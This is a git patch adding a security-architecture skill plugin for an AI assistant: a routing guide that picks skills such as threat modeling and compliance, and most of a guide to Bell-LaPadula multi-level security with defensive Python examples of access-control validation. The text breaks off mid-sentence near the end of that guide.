From 4fad9f51e1e66de109d645d4dcce811d8d861f80 Mon Sep 17 00:00:00 2001 From: Zhongwei Li Date: Sun, 30 Nov 2025 08:59:46 +0800 Subject: [PATCH] Initial commit --- .claude-plugin/plugin.json | 12 + README.md | 3 + plugin.lock.json | 77 ++ skills/using-security-architect/SKILL.md | 353 ++++++++ .../classified-systems-security.md | 632 +++++++++++++++ .../compliance-awareness-and-mapping.md | 563 +++++++++++++ .../documenting-threats-and-controls.md | 620 ++++++++++++++ .../secure-by-design-patterns.md | 497 ++++++++++++ .../security-architecture-review.md | 433 ++++++++++ ...ecurity-authorization-and-accreditation.md | 757 ++++++++++++++++++ .../security-controls-design.md | 537 +++++++++++++ .../threat-modeling.md | 565 +++++++++++++ 12 files changed, 5049 insertions(+) create mode 100644 .claude-plugin/plugin.json create mode 100644 README.md create mode 100644 plugin.lock.json create mode 100644 skills/using-security-architect/SKILL.md create mode 100644 skills/using-security-architect/classified-systems-security.md create mode 100644 skills/using-security-architect/compliance-awareness-and-mapping.md create mode 100644 skills/using-security-architect/documenting-threats-and-controls.md create mode 100644 skills/using-security-architect/secure-by-design-patterns.md create mode 100644 skills/using-security-architect/security-architecture-review.md create mode 100644 skills/using-security-architect/security-authorization-and-accreditation.md create mode 100644 skills/using-security-architect/security-controls-design.md create mode 100644 skills/using-security-architect/threat-modeling.md diff --git a/.claude-plugin/plugin.json b/.claude-plugin/plugin.json new file mode 100644 index 0000000..02ee8e3 --- /dev/null +++ b/.claude-plugin/plugin.json @@ -0,0 +1,12 @@ +{ + "name": "ordis-security-architect", + "description": "Threat modeling, security controls, compliance, ATO - 9 comprehensive security skills", + "version": "1.0.1", + "author": { + "name": "tachyon-beep", + "url": "https://github.com/tachyon-beep" + }, + "skills": [ + "./skills" + ] +} \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..100ad07 --- /dev/null +++ b/README.md @@ -0,0 +1,3 @@ +# ordis-security-architect + +Threat modeling, security controls, compliance, ATO - 9 comprehensive security skills diff --git a/plugin.lock.json b/plugin.lock.json new file mode 100644 index 0000000..e88369a --- /dev/null +++ b/plugin.lock.json @@ -0,0 +1,77 @@ +{ + "$schema": "internal://schemas/plugin.lock.v1.json", + "pluginId": "gh:tachyon-beep/skillpacks:plugins/ordis-security-architect", + "normalized": { + "repo": null, + "ref": "refs/tags/v20251128.0", + "commit": "2b527ed26da43532f4fad648befa2e8f60611800", + "treeHash": "7d110866bbf87f7ea40dd0982cb8a2873b537e6a29de50d70b194e8b39034aed", + "generatedAt": "2025-11-28T10:28:33.210892Z", + "toolVersion": "publish_plugins.py@0.2.0" + }, + "origin": { + "remote": "git@github.com:zhongweili/42plugin-data.git", + "branch": "master", + "commit": "aa1497ed0949fd50e99e70d6324a29c5b34f9390", + "repoRoot": "/Users/zhongweili/projects/openmind/42plugin-data" + }, + "manifest": { + "name": "ordis-security-architect", + "description": "Threat modeling, security controls, compliance, ATO - 9 comprehensive security skills", + "version": "1.0.1" + }, + "content": { + "files": [ + { + "path": "README.md", + "sha256": "86b9b43aa7dac0fe85780250127ccac0cb0412481b9f2bf94b02ccd22dd7fc0f" + }, + { + "path": ".claude-plugin/plugin.json", + "sha256": "85abc799c8768a6111a95741f765c617d8665885ce18a0e79877d3a714fb5ac4" + }, + { + "path": "skills/using-security-architect/security-architecture-review.md", + "sha256": "3a88ebda527725c71638289683dc8065e30455c43a9b5d2346efd87bdd03fa91" + }, + { + "path": "skills/using-security-architect/threat-modeling.md", + "sha256": "ccb8aafbc6ba19ffbbc49eaaccce2f2d7965ebc116b1042bf77c30b39bd1a3cb" + }, + { + "path": "skills/using-security-architect/security-controls-design.md", + "sha256": "3d92f1e4504df0af9413049e61ed23c02ce36324b377eb826f7902160f1a0fab" + }, + { + "path": "skills/using-security-architect/security-authorization-and-accreditation.md", + "sha256": "f2976a1c9e809e57176e6faa8e6d05dd0df599feed7592c8ff39c4d9da71ef77" + }, + { + "path": "skills/using-security-architect/classified-systems-security.md", + "sha256": "573fc1ebf064fea1d773084d5a856a38f2d2a2f75e30e283714ff58417f825f9" + }, + { + "path": "skills/using-security-architect/compliance-awareness-and-mapping.md", + "sha256": "3f518d89a072b55ab42019c856131b247657149f037779f1ddb1fbf572b2e5ed" + }, + { + "path": "skills/using-security-architect/secure-by-design-patterns.md", + "sha256": "fef561acb61e5dad99b31ebef436786a728c74732d93d0505cd5c60e31117a42" + }, + { + "path": "skills/using-security-architect/SKILL.md", + "sha256": "289523c06f2ecf5ee0cb34a9a4505217a652a4589c750129c7c70c9f1038e9d9" + }, + { + "path": "skills/using-security-architect/documenting-threats-and-controls.md", + "sha256": "f408f1bc3af45d77c1ce8151046593eee6f93fcda611ffda6ad274048d676154" + } + ], + "dirSha256": "7d110866bbf87f7ea40dd0982cb8a2873b537e6a29de50d70b194e8b39034aed" + }, + "security": { + "scannedAt": null, + "scannerVersion": null, + "flags": [] + } +} \ No newline at end of file diff --git a/skills/using-security-architect/SKILL.md b/skills/using-security-architect/SKILL.md new file mode 100644 index 0000000..311905d --- /dev/null +++ b/skills/using-security-architect/SKILL.md @@ -0,0 +1,353 @@ +--- +name: using-security-architect +description: Routes to security architecture skills - threat modeling, controls, compliance, authorization +mode: true +--- + +# Using Security Architect + +## Overview + +This meta-skill routes you to the right security architecture skills based on your situation. Load this skill when you need security expertise but aren't sure which specific security skill to use. + +**Core Principle**: Different security tasks require different skills. Match your situation to the appropriate skill, load only what you need. + +## When to Use + +Load this skill when: +- Starting any security-related task +- User mentions: "security", "threat", "authentication", "authorization", "compliance", "classified", "review this design" +- You recognize security implications but unsure which skill applies +- You need to document security decisions + +**Don't use for**: Simple features with no security implications (e.g., UI styling, basic CRUD with existing auth) + +## Routing by Situation + +### New System Design + +**Symptoms**: "Design a new...", "We're building...", "Greenfield project" + +**Route to**: +1. **First**: [threat-modeling.md](threat-modeling.md) - Identify threats before implementation +2. **Then**: [secure-by-design-patterns.md](secure-by-design-patterns.md) - Design with security built-in +3. **Then**: [security-controls-design.md](security-controls-design.md) - Select appropriate controls + +**Example**: "Design authentication system" → Load all three in order + +--- + +### Existing System Review + +**Symptoms**: "Review this design", "Security audit", "Does this look secure?" + +**Route to**: [security-architecture-review.md](security-architecture-review.md) + +**When to add**: +- Add [threat-modeling.md](threat-modeling.md) if design lacks threat analysis +- Add [secure-by-design-patterns.md](secure-by-design-patterns.md) if architecture has gaps + +**Example**: "Review this plugin system" → Load [security-architecture-review.md](security-architecture-review.md) + +--- + +### Specific Security Domains + +#### Authentication/Authorization Design +**Route to**: +- [threat-modeling.md](threat-modeling.md) (identify auth threats) +- [secure-by-design-patterns.md](secure-by-design-patterns.md) (defense-in-depth, fail-secure) +- Consider: [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) (if government/ATO needed) + +#### Configuration & Secrets +**Route to**: +- [threat-modeling.md](threat-modeling.md) (config tampering threats) +- [security-controls-design.md](security-controls-design.md) (separation of config vs code) + +#### API Security +**Route to**: +- [threat-modeling.md](threat-modeling.md) (STRIDE on API endpoints) +- [security-architecture-review.md](security-architecture-review.md) (review access controls) + +--- + +### Specialized Contexts (Extensions) + +#### Classified/High-Security Systems + +**Symptoms**: "TOP SECRET", "classified data", "security clearances", "multi-level security", "Bell-LaPadula" + +**Route to**: +1. [classified-systems-security.md](classified-systems-security.md) (REQUIRED for classified contexts) +2. Plus core skills: [threat-modeling.md](threat-modeling.md), [secure-by-design-patterns.md](secure-by-design-patterns.md) + +**Example**: "Design system handling SECRET and UNCLASSIFIED" → Load [classified-systems-security.md](classified-systems-security.md) first + +--- + +#### Compliance/Regulatory + +**Symptoms**: "HIPAA", "PCI-DSS", "SOC2", "GDPR", "compliance audit", "regulatory requirements" + +**Route to**: [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) + +**When to add**: +- Add [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) if ATO/AIS needed +- Add core skills for implementing compliant controls + +**Example**: "Build HIPAA-compliant system" → Load [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) + [threat-modeling.md](threat-modeling.md) + +--- + +#### Government Authorization + +**Symptoms**: "ATO", "AIS", "authority to operate", "SSP", "SAR", "POA&M", "FedRAMP", "FISMA" + +**Route to**: [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) + +**Cross-reference**: Load `muna/technical-writer/operational-acceptance-documentation` for SSP/SAR writing + +--- + +### Documentation Tasks + +**Symptoms**: "Document security decisions", "Write security docs", "Explain threat model" + +**Route to**: [documenting-threats-and-controls.md](documenting-threats-and-controls.md) + +**Cross-faction reference**: Load `muna/technical-writer/documentation-structure` for ADR format, clarity guidelines + +**Example**: "Document why we chose MLS" → Load [documenting-threats-and-controls.md](documenting-threats-and-controls.md) + documentation-structure + +--- + +## Core vs Extension Skills + +### Core Skills (Universal - Use for Any Project) + +Load these for **any** project with security needs: + +- [threat-modeling.md](threat-modeling.md) - Identify threats (STRIDE, attack trees) +- [security-controls-design.md](security-controls-design.md) - Design controls (defense-in-depth, fail-secure) +- [security-architecture-review.md](security-architecture-review.md) - Review designs for security gaps +- [secure-by-design-patterns.md](secure-by-design-patterns.md) - Apply secure design patterns +- [documenting-threats-and-controls.md](documenting-threats-and-controls.md) - Document security decisions + +### Extension Skills (Specialized - Use for Specific Contexts) + +Load these **only** when context requires: + +- [classified-systems-security.md](classified-systems-security.md) - Handling classified/sensitive data with clearances +- [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) - Regulatory compliance (HIPAA, PCI-DSS, GDPR, etc.) +- [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) - Government ATO/AIS processes + +**Decision**: If you're unsure whether context is "specialized", start with core skills. Specialized contexts will be explicit in requirements. + +--- + +## Decision Tree + +``` +Is this security-related? +├─ No → Don't load security skills +└─ Yes → Continue + +What's the situation? +├─ New system design → threat-modeling + secure-by-design-patterns + security-controls-design +├─ Reviewing existing → architecture-security-review +├─ Documenting security → documenting-threats-and-controls + muna/technical-writer/documentation-structure +└─ Domain-specific → See "Specific Security Domains" above + +Is this a specialized context? +├─ Classified data → ADD: classified-systems-security +├─ Compliance required → ADD: compliance-awareness-and-mapping +├─ Government ATO → ADD: security-authorization-and-accreditation +└─ No → Core skills sufficient +``` + +--- + +## Cross-Faction References + +Security work often requires skills from other factions: + +**Muna (Documentation)**: +- `muna/technical-writer/documentation-structure` - When documenting security (ADRs, SSPs) +- `muna/technical-writer/clarity-and-style` - When explaining security to non-experts + +**Load both factions when**: Documenting security decisions, writing security policies, explaining threats to stakeholders + +--- + +## Common Routing Patterns + +### Pattern 1: New Authentication System +``` +User: "Design authentication with passwords and OAuth" +You: Loading threat-modeling + secure-by-design-patterns + security-controls-design +``` + +### Pattern 2: Design Review +``` +User: "Review this plugin security design" +You: Loading architecture-security-review +``` + +### Pattern 3: Classified System +``` +User: "Build system handling TOP SECRET data" +You: Loading classified-systems-security + threat-modeling + secure-by-design-patterns +``` + +### Pattern 4: Compliance Project +``` +User: "Build HIPAA-compliant patient portal" +You: Loading compliance-awareness-and-mapping + threat-modeling + security-controls-design +``` + +### Pattern 5: Security Documentation +``` +User: "Document our MLS security decisions" +You: Loading documenting-threats-and-controls + muna/technical-writer/documentation-structure +``` + +--- + +## When NOT to Load Security Skills + +**Don't load security skills for**: +- UI styling (colors, fonts, layouts) +- Basic CRUD with existing, tested auth +- Non-security refactoring (renaming variables, extracting functions) +- Documentation that isn't security-related + +**Example**: "Add dark mode toggle to settings" → No security skills needed (unless settings include security-sensitive preferences) + +--- + +## Quick Reference Table + +| Task Type | Load These Skills | Notes | +|-----------|------------------|-------| +| **New system design** | threat-modeling, secure-by-design-patterns, security-controls-design | Load in order | +| **Design review** | architecture-security-review | Add threat-modeling if no threat analysis exists | +| **Authentication** | threat-modeling, secure-by-design-patterns | Consider authorization-and-accreditation if ATO needed | +| **API security** | threat-modeling, architecture-security-review | Apply STRIDE to endpoints | +| **Classified data** | classified-systems-security + core skills | Extension required | +| **Compliance** | compliance-awareness-and-mapping + core skills | Extension for regulatory contexts | +| **Government ATO** | security-authorization-and-accreditation + core skills | Extension for ATO/AIS | +| **Document security** | documenting-threats-and-controls, muna/documentation-structure | Cross-faction | + +--- + +## Common Mistakes + +### ❌ Loading All Skills at Once +**Wrong**: Load all 8 security-architect skills for every security task +**Right**: Load only the skills your situation needs (use decision tree) + +### ❌ Skipping Threat Modeling +**Wrong**: Jump straight to implementation for new security features +**Right**: Always threat model first for new systems/features + +### ❌ Using Core Skills for Specialized Contexts +**Wrong**: Use generic threat modeling for classified systems +**Right**: Load classified-systems-security for MLS contexts + +### ❌ Not Cross-Referencing Muna +**Wrong**: Write security docs without documentation structure skills +**Right**: Load both ordis/documenting-threats + muna/documentation-structure + +--- + +## Examples + +### Example 1: Payment Processing System + +``` +User: "Design a payment processing microservice" + +Your routing: +1. Recognize: New system + financial domain → security critical +2. Load: threat-modeling (identify payment-specific threats) +3. Load: secure-by-design-patterns (encryption, secrets management) +4. Load: security-controls-design (PCI-DSS controls) +5. Consider: compliance-awareness-and-mapping (PCI-DSS is compliance requirement) +``` + +### Example 2: Simple Feature (No Security Needed) + +``` +User: "Add a favorites button to the UI" + +Your routing: +1. Recognize: UI feature, uses existing auth, no new security surface +2. Decision: No security skills needed +3. Proceed with standard implementation +``` + +### Example 3: Classified System Architecture + +``` +User: "Review architecture for system handling SECRET and UNCLASSIFIED data" + +Your routing: +1. Recognize: Classified context (SECRET mentioned) + review task +2. Load: classified-systems-security (MLS patterns required) +3. Load: architecture-security-review (review process) +4. Load: threat-modeling (if threats not already modeled) +``` + +--- + +## Phase 1 Note + +**Currently Available** (Phase 1): +- ✅ `using-security-architect` (this skill) +- ✅ `threat-modeling` (in progress) + +**Coming Soon** (Phases 2-3): +- `security-controls-design` +- `architecture-security-review` +- `secure-by-design-patterns` +- `classified-systems-security` +- `compliance-awareness-and-mapping` +- `security-authorization-and-accreditation` +- `documenting-threats-and-controls` + +**For Phase 1**: Focus on threat-modeling as primary skill. Reference other skills by name even though they're not implemented yet - this tests the routing logic. + +--- + +## Summary + +**This skill maps your situation → specific security skills to load.** + +1. Identify your situation (new system, review, specialized context) +2. Use decision tree to find applicable skills +3. Load core skills for universal needs +4. Add extension skills for specialized contexts +5. Cross-reference Muna for documentation needs +6. Don't load security skills when not needed + +**Meta-rule**: When in doubt, start with [threat-modeling.md](threat-modeling.md). Threats drive everything else. + +--- + +## Security Architect Specialist Skills Catalog + +After routing, load the appropriate specialist skill for detailed guidance: + +### Core Skills (Universal) + +1. [threat-modeling.md](threat-modeling.md) - STRIDE analysis, attack trees, threat identification, security-critical systems analysis +2. [secure-by-design-patterns.md](secure-by-design-patterns.md) - Defense-in-depth, fail-secure design, least privilege, separation of concerns +3. [security-controls-design.md](security-controls-design.md) - Control selection, defense layering, encryption, secrets management +4. [security-architecture-review.md](security-architecture-review.md) - Design review process, security gap analysis, architecture evaluation +5. [documenting-threats-and-controls.md](documenting-threats-and-controls.md) - Security documentation, threat model writing, control documentation + +### Extension Skills (Specialized Contexts) + +6. [classified-systems-security.md](classified-systems-security.md) - Multi-level security (MLS), Bell-LaPadula, classified data handling, security clearances +7. [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) - HIPAA, PCI-DSS, SOC2, GDPR, regulatory mapping, compliance frameworks +8. [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) - ATO/AIS processes, SSP/SAR, POA&M, FedRAMP, FISMA, government authorization diff --git a/skills/using-security-architect/classified-systems-security.md b/skills/using-security-architect/classified-systems-security.md new file mode 100644 index 0000000..36db428 --- /dev/null +++ b/skills/using-security-architect/classified-systems-security.md @@ -0,0 +1,632 @@ + +# Classified Systems Security + +## Overview + +Implement multi-level security (MLS) for classified data. Core principle: **Invalid configurations must be impossible to create, not detected at runtime**. + +**Key insight**: You cannot "sanitize" your way out of classification violations. Use mandatory access control (MAC) with fail-fast validation at construction time. + +## When to Use + +Load this skill when: +- Handling classified data (UNOFFICIAL, OFFICIAL, SECRET, TOP SECRET) +- Implementing government/defense systems +- Designing multi-level security (MLS) architectures +- Processing data at different classification levels + +**Symptoms you need this**: +- "How do I handle SECRET and UNOFFICIAL data in the same pipeline?" +- Designing systems with clearance levels +- Government/defense contract requirements +- Data classification enforcement + +**Don't use for**: +- General security (use `ordis/security-architect/security-controls-design`) +- Non-classified sensitivity levels (use standard access control) + +## Bell-LaPadula MLS Model + +### The Two Rules + +**1. No Read Up (Simple Security Property)** +- Subject cannot read data at higher classification +- UNOFFICIAL component CANNOT read OFFICIAL data +- OFFICIAL component CANNOT read SECRET data + +**2. No Write Down (*-Property/Star Property)** +- Subject cannot write data to lower classification +- SECRET component CANNOT write to OFFICIAL sink +- OFFICIAL component CANNOT write to UNOFFICIAL sink + +### Classification Hierarchy + +``` +TOP SECRET (highest) + ↓ + SECRET + ↓ + PROTECTED + ↓ +OFFICIAL:SENSITIVE + ↓ + OFFICIAL + ↓ +UNOFFICIAL (lowest) +``` + +**Transitivity**: Data derived from SECRET is SECRET until formally declassified. + +### Example: Violations + +❌ **Read-Up Violation**: +```python +# OFFICIAL clearance component reading SECRET data +official_processor = Processor(clearance=SecurityLevel.OFFICIAL) +secret_source = DataSource(classification=SecurityLevel.SECRET) + +# VIOLATION: Cannot read up from OFFICIAL to SECRET +data = official_processor.read(secret_source) # ❌ FORBIDDEN +``` + +❌ **Write-Down Violation**: +```python +# SECRET component writing to OFFICIAL sink +secret_processor = Processor(clearance=SecurityLevel.SECRET) +official_sink = DataSink(classification=SecurityLevel.OFFICIAL) + +# VIOLATION: Cannot write down from SECRET to OFFICIAL +secret_processor.write(data, official_sink) # ❌ FORBIDDEN +``` + +✅ **Compliant Flow**: +```python +# Same clearance level throughout +secret_source = DataSource(classification=SecurityLevel.SECRET) +secret_processor = Processor(clearance=SecurityLevel.SECRET) +secret_sink = DataSink(classification=SecurityLevel.SECRET) + +# ✅ ALLOWED: All components at SECRET level +pipeline = Pipeline(secret_source, secret_processor, secret_sink) +``` + + +## Fail-Fast Construction-Time Validation + +### Principle: Prevent Invalid Configurations + +**Don't**: Detect violations at runtime (after data exposure) +**Do**: Reject invalid configurations at construction time (before data access) + +### Construction vs Runtime Validation + +❌ **Runtime Validation (Vulnerable)**: +```python +class Pipeline: + def __init__(self, source, processor, sink): + self.source = source + self.processor = processor + self.sink = sink + + def run(self): + # Runtime check - TOO LATE! + data = self.source.read() + if data.classification > self.processor.clearance: + raise SecurityError("Read-up violation") + + # Problem: Data already read from source before check + # Exposure window = time between read() and check +``` + +**Issue**: Data already accessed before violation detected. + +✅ **Fail-Fast Construction-Time (Secure)**: +```python +class Pipeline: + def __init__(self, source, processor, sink): + # Validate BEFORE creating pipeline + self._validate_clearances(source, processor, sink) + + self.source = source + self.processor = processor + self.sink = sink + + def _validate_clearances(self, source, processor, sink): + # Check no-read-up + if source.classification > processor.clearance: + raise SecurityError( + f"Read-up violation: Processor clearance {processor.clearance} " + f"cannot read source classified {source.classification}" + ) + + # Check no-write-down + if processor.clearance > sink.classification: + raise SecurityError( + f"Write-down violation: Processor {processor.clearance} " + f"cannot write to sink classified {sink.classification}" + ) + + # All validations passed + + def run(self): + # Only callable if construction succeeded + data = self.source.read() + processed = self.processor.process(data) + self.sink.write(processed) + +# Usage: +try: + # Validation happens at construction + pipeline = Pipeline(secret_source, official_processor, unofficial_sink) + # ❌ Above line raises SecurityError - pipeline never created +except SecurityError as e: + print(f"Configuration rejected: {e}") + sys.exit(1) +``` + +**Result**: Zero exposure window. Invalid pipeline cannot be created. + + +## Type-System Enforcement + +### Classification-Aware Types + +Use type system to make violations impossible at compile/construction time. + +```python +from typing import Generic, TypeVar +from enum import Enum + +class SecurityLevel(Enum): + UNOFFICIAL = 1 + OFFICIAL = 2 + OFFICIAL_SENSITIVE = 3 + PROTECTED = 4 + SECRET = 5 + TOP_SECRET = 6 + +# Generic type parameterized by classification +T = TypeVar('T', bound=SecurityLevel) + +class ClassifiedData(Generic[T]): + def __init__(self, data: any, classification: T): + self.data = data + self.classification = classification + +class DataSource(Generic[T]): + def __init__(self, classification: T): + self.classification = classification + + def read(self) -> ClassifiedData[T]: + return ClassifiedData(self._fetch(), self.classification) + +class Processor(Generic[T]): + def __init__(self, clearance: T): + self.clearance = clearance + + def process(self, data: ClassifiedData[T]) -> ClassifiedData[T]: + # Type system ensures data.classification <= self.clearance + return ClassifiedData(self._transform(data.data), data.classification) + +class DataSink(Generic[T]): + def __init__(self, classification: T): + self.classification = classification + + def write(self, data: ClassifiedData[T]): + # Type system ensures data.classification == self.classification + self._store(data.data) +``` + +**Type-safe pipeline**: +```python +# All components must be same classification level +secret_source: DataSource[SecurityLevel.SECRET] +secret_processor: Processor[SecurityLevel.SECRET] +secret_sink: DataSink[SecurityLevel.SECRET] + +# ✅ Type checker accepts this +pipeline = Pipeline(secret_source, secret_processor, secret_sink) + +# ❌ Type checker REJECTS this at compile time +official_processor: Processor[SecurityLevel.OFFICIAL] +pipeline = Pipeline(secret_source, official_processor, secret_sink) # Type error! +``` + + +## Trusted Downgrade Pattern + +### When Downgrading is Necessary + +Sometimes you need to declassify data (e.g., publishing redacted documents). This requires: + +1. **Formal Authority**: Authorized to declassify +2. **Explicit Process**: Manual review and approval +3. **Audit Trail**: Log all downgrade operations +4. **Trusted Service**: Part of Trusted Computing Base (TCB) + +### Trusted Downgrade Service + +```python +class TrustedDowngradeService: + """ + Trusted service operating at higher clearance level. + Part of Trusted Computing Base (TCB). + """ + def __init__(self, clearance: SecurityLevel): + self.clearance = clearance # Must be HIGH to read classified data + self._validate_authority() # Verify authorized to declassify + + def _validate_authority(self): + # Check this service has declassification authority + if not has_declassification_authority(self): + raise SecurityError("Service not authorized for declassification") + + def declassify( + self, + data: ClassifiedData, + target_level: SecurityLevel, + justification: str + ) -> ClassifiedData: + """ + Declassify data to lower classification level. + + Args: + data: Original classified data + target_level: Target classification (must be lower) + justification: Reason for declassification (audit trail) + + Returns: + Data at lower classification level + """ + # Validate this service can read the data + if data.classification > self.clearance: + raise SecurityError("Cannot declassify data above clearance") + + # Validate downgrade direction + if target_level >= data.classification: + raise SecurityError("Target must be lower than current classification") + + # Perform declassification (redaction, sanitization) + declassified_data = self._redact(data.data, target_level) + + # Audit trail + self._log_declassification( + original_level=data.classification, + target_level=target_level, + justification=justification, + timestamp=datetime.now() + ) + + # Return data at lower classification + return ClassifiedData(declassified_data, target_level) + + def _redact(self, data: any, target_level: SecurityLevel) -> any: + # Remove information inappropriate for target level + # This is where human review would occur in real systems + pass + + def _log_declassification(self, **kwargs): + # Immutable audit log + audit_log.append(kwargs) +``` + +### Trusted Downgrade in Pipeline + +```python +# Pipeline with trusted downgrade +secret_source = DataSource(SecurityLevel.SECRET) + +# Trusted service at SECRET level +downgrade_service = TrustedDowngradeService(clearance=SecurityLevel.SECRET) + +# Components at lower levels +official_processor = Processor(SecurityLevel.OFFICIAL) +unofficial_sink = DataSink(SecurityLevel.UNOFFICIAL) + +# Workflow: +def secure_pipeline(): + # 1. Read SECRET data (service has SECRET clearance) + secret_data = secret_source.read() + + # 2. Declassify to OFFICIAL (trusted service with authority) + official_data = downgrade_service.declassify( + secret_data, + SecurityLevel.OFFICIAL, + justification="Public release approval #12345" + ) + + # 3. Process at OFFICIAL level (no violation) + processed = official_processor.process(official_data) + + # 4. Declassify to UNOFFICIAL + unofficial_data = downgrade_service.declassify( + processed, + SecurityLevel.UNOFFICIAL, + justification="Redacted for public disclosure" + ) + + # 5. Write to UNOFFICIAL sink (no violation) + unofficial_sink.write(unofficial_data) +``` + +**Key points**: +- Downgrade service operates at HIGH clearance (can read classified data) +- Explicit declassification with justification (not implicit) +- Audit trail for every downgrade operation +- Manual review in production (automated only for specific patterns) + + +## Immutability Enforcement + +### Classification Cannot Be Reduced + +Once data is classified at a level, it cannot be reduced without formal declassification. + +❌ **Mutable Classification (Insecure)**: +```python +class Data: + def __init__(self, content, classification): + self.content = content + self.classification = classification # Mutable! + +data = Data("secret info", SecurityLevel.SECRET) + +# ❌ Can be modified at runtime +data.classification = SecurityLevel.UNOFFICIAL # Forbidden! +``` + +✅ **Immutable Classification (Secure)**: +```python +from dataclasses import dataclass + +@dataclass(frozen=True) +class ClassifiedData: + """Immutable dataclass - classification cannot change.""" + content: str + classification: SecurityLevel + +data = ClassifiedData("secret info", SecurityLevel.SECRET) + +# ❌ Raises FrozenInstanceError +data.classification = SecurityLevel.UNOFFICIAL # Cannot modify! +``` + +### Derived Data Inherits Classification + +```python +def derive_data(original: ClassifiedData) -> ClassifiedData: + """ + Derived data has SAME classification as original. + Cannot be lower (information flow property). + """ + transformed = transform(original.content) + + # Derived data inherits original classification + return ClassifiedData(transformed, original.classification) + +# Example: +secret_data = ClassifiedData("secret", SecurityLevel.SECRET) +derived = derive_data(secret_data) + +assert derived.classification == SecurityLevel.SECRET # Always true +``` + + +## Minimum Security Level Computation + +### Pipeline-Wide Clearance + +Compute minimum clearance required across all components in pipeline. + +```python +def compute_pipeline_clearance(components: list) -> SecurityLevel: + """ + Compute minimum clearance needed to operate pipeline. + All components must have this clearance or higher. + """ + max_classification = SecurityLevel.UNOFFICIAL + + for component in components: + if hasattr(component, 'classification'): + # Data source/sink - sets required clearance + if component.classification > max_classification: + max_classification = component.classification + + return max_classification + +def validate_pipeline(components: list, processor_clearance: SecurityLevel): + """ + Validate processor clearance sufficient for pipeline. + """ + required_clearance = compute_pipeline_clearance(components) + + if processor_clearance < required_clearance: + raise SecurityError( + f"Insufficient clearance: Processor has {processor_clearance}, " + f"pipeline requires {required_clearance}" + ) + + print(f"✓ Pipeline validated: Clearance {processor_clearance} sufficient") + +# Usage: +components = [ + DataSource(SecurityLevel.SECRET), + DataSink(SecurityLevel.OFFICIAL) +] + +processor = Processor(SecurityLevel.SECRET) + +# Validate at construction time +validate_pipeline(components, processor.clearance) # ✓ Passes + +processor_low = Processor(SecurityLevel.OFFICIAL) +validate_pipeline(components, processor_low.clearance) # ❌ Raises SecurityError +``` + + +## Mandatory Access Control (MAC) + +### MAC vs DAC + +**Discretionary Access Control (DAC)**: +- Owner controls access (chmod, ACLs) +- Users can grant access to others +- Examples: RBAC, file permissions + +**Mandatory Access Control (MAC)**: +- System enforces access based on security labels +- Users CANNOT override (not discretionary) +- Examples: SELinux, Bell-LaPadula + +### MAC for Classified Systems + +```python +class MandatoryAccessControl: + """ + Enforces Bell-LaPadula rules. + Users/processes CANNOT override. + """ + def __init__(self): + self.policy = BellLaPadulaPolicy() + + def check_read_access( + self, + subject_clearance: SecurityLevel, + object_classification: SecurityLevel + ) -> bool: + """ + No-read-up: Subject can only read at or below clearance. + """ + return subject_clearance >= object_classification + + def check_write_access( + self, + subject_clearance: SecurityLevel, + object_classification: SecurityLevel + ) -> bool: + """ + No-write-down: Subject can only write at or above clearance. + """ + return subject_clearance <= object_classification + + def enforce_access(self, operation: str, subject, object): + """ + Enforce MAC policy. Users cannot override. + """ + if operation == "read": + if not self.check_read_access(subject.clearance, object.classification): + raise SecurityError(f"MAC violation: Read-up forbidden") + + elif operation == "write": + if not self.check_write_access(subject.clearance, object.classification): + raise SecurityError(f"MAC violation: Write-down forbidden") + + # Access granted + return True + +# Usage: +mac = MandatoryAccessControl() + +subject = Process(clearance=SecurityLevel.OFFICIAL) +secret_obj = Object(classification=SecurityLevel.SECRET) + +# ❌ Read-up violation - MAC enforces even if user wants access +mac.enforce_access("read", subject, secret_obj) # Raises SecurityError +``` + +**Key difference**: With DAC (RBAC), you could grant a role access. With MAC, no amount of permission grants can override clearance levels. + + +## Quick Reference: Decision Tree + +``` +Need to handle classified data? +│ +├─ Same classification level for all components? +│ └─→ ✓ Simple: All components at same level (e.g., all SECRET) +│ +├─ Different levels in same pipeline? +│ ├─ Can you redesign to separate pipelines? +│ │ └─→ ✓ Preferred: Separate SECRET and UNOFFICIAL pipelines +│ │ +│ └─ Must mix levels? +│ └─→ Use Trusted Downgrade Service +│ - Service operates at HIGH clearance +│ - Explicit declassification with justification +│ - Audit trail +│ - Manual review for authority +│ +└─ Validating pipeline security? + ├─ Runtime checks? ❌ Too late (exposure window) + └─ Construction-time validation? ✓ Correct (fail-fast) +``` + + +## Common Mistakes + +### ❌ Sanitization Instead of Declassification + +**Wrong**: "I'll strip SECRET fields and call it UNOFFICIAL" + +**Right**: Formal declassification requires: +- Authority to declassify +- Manual review of what can be released +- Audit trail +- Understanding of inference attacks (aggregate data can leak secrets) + +**Why**: You cannot automatically determine what's safe to declassify. Requires human judgment and authority. + + +### ❌ Runtime Validation Only + +**Wrong**: Check clearances when processing data + +**Right**: Fail-fast at construction time before any data access + +**Why**: Runtime checks have exposure windows. Construction-time validation = zero exposure. + + +### ❌ Treating Clearances as Roles + +**Wrong**: "Just add a 'SECRET' role in RBAC" + +**Right**: Implement Mandatory Access Control (MAC) with Bell-LaPadula + +**Why**: Clearances are not discretionary. Users cannot grant access across classification levels. + + +### ❌ Mutable Classification + +**Wrong**: Allow classification field to be modified at runtime + +**Right**: Immutable dataclasses, frozen classification after assignment + +**Why**: Classification cannot decrease without formal declassification. + + +### ❌ Missing Information Flow Analysis + +**Wrong**: Focus only on direct access (can processor read source?) + +**Right**: Analyze full information flow (derived data inherits classification) + +**Why**: Data derived from SECRET is SECRET until declassified. + + +## Cross-References + +**Use WITH this skill**: +- `ordis/security-architect/secure-by-design-patterns` - Fail-fast validation pattern +- `ordis/security-architect/security-controls-design` - Defense-in-depth for classified systems + +**Use AFTER this skill**: +- `ordis/security-architect/security-architecture-review` - Review classified systems against Bell-LaPadula + +## Real-World Impact + +**Systems using Bell-LaPadula + fail-fast enforcement**: +- **Elspeth MLS Pipeline**: Prevented VULN-004 class (security level overrides) by 